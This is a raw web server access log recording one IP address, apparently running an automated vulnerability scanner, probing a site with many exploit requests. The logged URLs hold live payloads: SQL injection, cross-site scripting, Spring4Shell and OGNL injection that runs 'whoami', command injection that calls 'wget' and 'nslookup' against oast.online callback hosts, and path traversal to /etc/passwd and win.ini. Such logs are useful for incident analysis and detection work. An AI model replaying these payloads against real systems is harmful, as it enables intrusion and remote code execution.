[24/Apr/2025:08:07:04 -0400] "POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:07:04 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:07:09 -0400] "POST /?rest_route=/olistener/new HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:07:13 -0400] "GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/616.20.13 (KHTML, like Gecko) Version/17.7.74 Safari/616.20.13" 154.84.62.234 - - [24/Apr/2025:08:07:17 -0400] "GET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:08:28 -0400] "GET /user/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.8.19" 154.84.62.234 - - [24/Apr/2025:08:08:36 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.6.20" 154.84.62.234 - - [24/Apr/2025:08:08:43 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0" 154.84.62.234 - - [24/Apr/2025:08:08:45 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/617.2.4 (KHTML, like Gecko) Version/17.3 Safari/617.2.4" 
154.84.62.234 - - [24/Apr/2025:08:08:47 -0400] "POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0" 154.84.62.234 - - [24/Apr/2025:08:08:52 -0400] "GET /wp-content/plugins/stopbadbots/assets/js/stopbadbots.js HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.26" 154.84.62.234 - - [24/Apr/2025:08:08:55 -0400] "POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:08:09:02 -0400] "POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.4.26" 154.84.62.234 - - [24/Apr/2025:08:09:15 -0400] "GET /wp-content/plugins/site-offline/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/618.31.14 (KHTML, like Gecko) Version/17.7 Safari/618.31.14" 154.84.62.234 - admin [24/Apr/2025:08:09:18 -0400] "POST /mgmt/tm/util/bash HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:09:36 -0400] "GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Teak/4.3.1 Version/17.4.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:09:50 -0400] "HEAD /wp-login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:10:06 -0400] "POST /wp-json/am-member/license HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 
Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:10:13 -0400] "POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:10:19 -0400] "GET /proxy?url=http%3a//0:8080/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:08:10:23 -0400] "GET /wp-content/uploads/html2wp/2w9rfS6dIPFtn6S4Y0Rc4bn8u4S.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:08:12:05 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0" 154.84.62.234 - - [24/Apr/2025:08:12:09 -0400] "POST /wp-json/rsvpmaker/v1/stripesuccess/anythinghere HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:12:12 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0" 154.84.62.234 - - [24/Apr/2025:08:12:18 -0400] "GET /wp-content/plugins/simple-membership/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:08:12:29 -0400] "GET /service/0/test.oast.me HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.9.16" 154.84.62.234 - - [24/Apr/2025:08:12:34 -0400] "GET /api/search/attribute?versionid=*&tf_version=%27+and+(select%20pg_sleep(7))+ISNULL-- HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:13:20 -0400] "GET 
/wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:13:22 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:08:15:05 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:08:15:26 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:15:39 -0400] "GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.20" 154.84.62.234 - - [24/Apr/2025:08:17:07 -0400] "POST /api/login HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.6.18" 154.84.62.234 - - [24/Apr/2025:08:17:13 -0400] "GET /backend/backend/auth/signin HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:18:11 -0400] "POST /functionRouter HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:18:28 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:08:18:28 -0400] "GET 
/?class.module.classLoader.resources.context.configFile=https://d04qr7ij4pq19d75k490d79hw7x8ae5i4.oast.online&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.4.26" 154.84.62.234 - - [24/Apr/2025:08:18:28 -0400] "GET /?class.module.classLoader.resources.context.configFile=http://d04qr7ij4pq19d75k4903b3zdwrrooi81.oast.online&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/8.0.0 Version/17.4.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:18:28 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:18:28 -0400] "GET /sap/admin/public/default.html HTTP/1.1" 200 0 "-" "-" 154.84.62.234 - - [24/Apr/2025:08:18:29 -0400] "GET /sap/public/bc/ur/Login/assets/corbu/sap_logo.png HTTP/1.1" 200 0 "-" "-" 154.84.62.234 - - [24/Apr/2025:08:18:31 -0400] "GET / HTTP/1.1" 200 0 "-" "-" 154.84.62.234 - - [24/Apr/2025:08:18:33 -0400] "GET / HTTP/1.1" 200 0 "-" "-" 154.84.62.234 - - [24/Apr/2025:08:18:35 -0400] "POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:18:43 -0400] "GET /OA_CGI/FNDWRR.exe HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:08:18:46 -0400] "POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:08:19:20 -0400] "GET /wp-content/plugins/feed-them-social/readme.txt HTTP/1.1" 200 0 "-" 
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0" 154.84.62.234 - - [24/Apr/2025:08:19:25 -0400] "GET /?location=search HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:19:26 -0400] "GET /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:08:19:26 -0400] "POST /cms/content/list HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/617.14 (KHTML, like Gecko) Version/17.4.63 Safari/617.14" 154.84.62.234 - - [24/Apr/2025:08:19:32 -0400] "POST /admin/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:70.0) Gecko/20100101 Firefox/70.0" 154.84.62.234 - - [24/Apr/2025:08:19:55 -0400] "GET /iupjournals/index.php/esj HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:19:55 -0400] "POST /ca/rest/certrequests HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:20:02 -0400] "POST /apisix/batch-requests HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36 HeyTapBrowser/45.11.0.1.1 Chrome/91.0.4472.88" 154.84.62.234 - - [24/Apr/2025:08:20:04 -0400] "GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:20:06 -0400] "GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:08:20:10 -0400] "GET 
/api/2w9rfRiATQu2Kk2ByU45IKzGlXg HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:08:20:11 -0400] "GET /wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:20:13 -0400] "GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:20:13 -0400] "POST /actuator/gateway/routes/2w9rfWhcJKnVkXvlNZDrEW7EpCk HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:08:20:15 -0400] "GET /vcac/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:08:20:20 -0400] "POST /actuator/gateway/refresh HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:08:20:23 -0400] "GET /vcac/?original_uri=https://mgrokokbet.id%2Fvcac HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:08:20:23 -0400] "GET /modules/appagebuilder/config.xml HTTP/1.1" 200 119098 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:08:20:27 -0400] "DELETE /actuator/gateway/routes/2w9rfWhcJKnVkXvlNZDrEW7EpCk HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:20:29 -0400] "POST /modules/appagebuilder/apajax.php?rand=8706356016209 HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 
154.84.62.234 - - [24/Apr/2025:08:20:36 -0400] "POST /api.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:20:37 -0400] "POST /modules/appagebuilder/apajax.php?rand=2465464578415 HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (ZZ; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:08:20:44 -0400] "POST /modules/appagebuilder/apajax.php?rand=7462234183742 HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.7.23" 154.84.62.234 - - [24/Apr/2025:08:23:46 -0400] "GET /Main/Default.aspx?viewSurveyError=Unknown+survey\"><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.44 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:23:52 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:08:24:38 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:88.0) Gecko/20100101 Firefox/88.0" 154.84.62.234 - - [24/Apr/2025:08:25:14 -0400] "POST /login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:25:33 -0400] "POST /servlet/GetProductVersion HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:08:25:48 -0400] "POST /geoserver/wms HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.2.19" 154.84.62.234 - - [24/Apr/2025:08:26:01 -0400] "GET 
/cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://d04qr7ij4pq19d75k490hw3q34xigux8w.oast.online;%27 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:08:26:03 -0400] "POST /cgi-bin/nightled.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:08:26:14 -0400] "GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://d04qr7ij4pq19d75k490u6tke854jxr51.oast.online; HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.5.16" 154.84.62.234 - - [24/Apr/2025:08:26:50 -0400] "GET /bin/login/XWikiLogin?xpage=uorgsuggest&uorg=user&wiki&media=json HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:26:56 -0400] "GET /xwiki/bin/login/XWikiLogin?xpage=uorgsuggest&uorg=user&wiki&media=json HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:27:10 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.26" 154.84.62.234 - - [24/Apr/2025:08:27:15 -0400] "GET /cgi-bin/downloadFlile.cgi?payload=`ls>../2w9rfVVWVrgdtVrelzJZACumkw0` HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:08:27:17 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.3.17" 154.84.62.234 - - [24/Apr/2025:08:27:20 -0400] "GET /2w9rfVVWVrgdtVrelzJZACumkw0 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - 
[24/Apr/2025:08:27:44 -0400] "GET /wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=publish HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0) AppleWebKit/616.3 (KHTML, like Gecko) Version/17.5.22 Safari/616.3" 154.84.62.234 - - [24/Apr/2025:08:27:49 -0400] "GET /wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299" 154.84.62.234 - - [24/Apr/2025:08:28:40 -0400] "POST /index.php?owa_do=base.loginForm&owa_site_id HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:28:48 -0400] "GET /owa-data/caches/1/owa_user/c30da9265ba0a4704db9229f864c9eb7.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:28:58 -0400] "POST /index.php?owa_do=base.loginForm&owa_site_id HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/618.5.10 (KHTML, like Gecko) Version/17.5 Safari/618.5.10" 154.84.62.234 - - [24/Apr/2025:08:29:03 -0400] "POST /alerts/alertLightbox.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:08:29:06 -0400] "POST /alerts/alertConfigField.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 154.84.62.234 - - [24/Apr/2025:08:30:21 -0400] "GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1" 200 0 "-" "-" 154.84.62.234 - - [24/Apr/2025:08:30:21 -0400] "POST /dologin.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:30:41 -0400] "POST 
/admin/uploads.php?id=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:08:30:49 -0400] "GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:30:54 -0400] "POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.6) AppleWebKit/616.20 (KHTML, like Gecko) Version/17.1.83 Safari/616.20" 154.84.62.234 - - [24/Apr/2025:08:30:55 -0400] "POST /js/filemanager/api/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:30:57 -0400] "GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20d04qr7ij4pq19d75k490j1grmfxuwbxps.oast.online%22%29%7D/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:08:31:03 -0400] "GET /2w9rfTa76utUuEcAEXb7j8Gedgm.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0" 154.84.62.234 - - [24/Apr/2025:08:31:03 -0400] "GET /index.php/video/?dl=aHR0cHM6Ly9vYXN0Lm1lLw== HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0" 154.84.62.234 - - [24/Apr/2025:08:31:16 -0400] "POST /OASREST/v2/authenticate HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_1_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.5 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:31:22 -0400] "GET 
/elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0" 154.84.62.234 - - [24/Apr/2025:08:32:01 -0400] "POST /api/content/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:32:09 -0400] "GET /2w9rfZ8Absp6XPLSHBAaQoVkBJT.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:33:47 -0400] "GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:08:34:25 -0400] "GET /admin/ajax/pages.php?id=(sleep(6)) HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:34:27 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.4 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:35:37 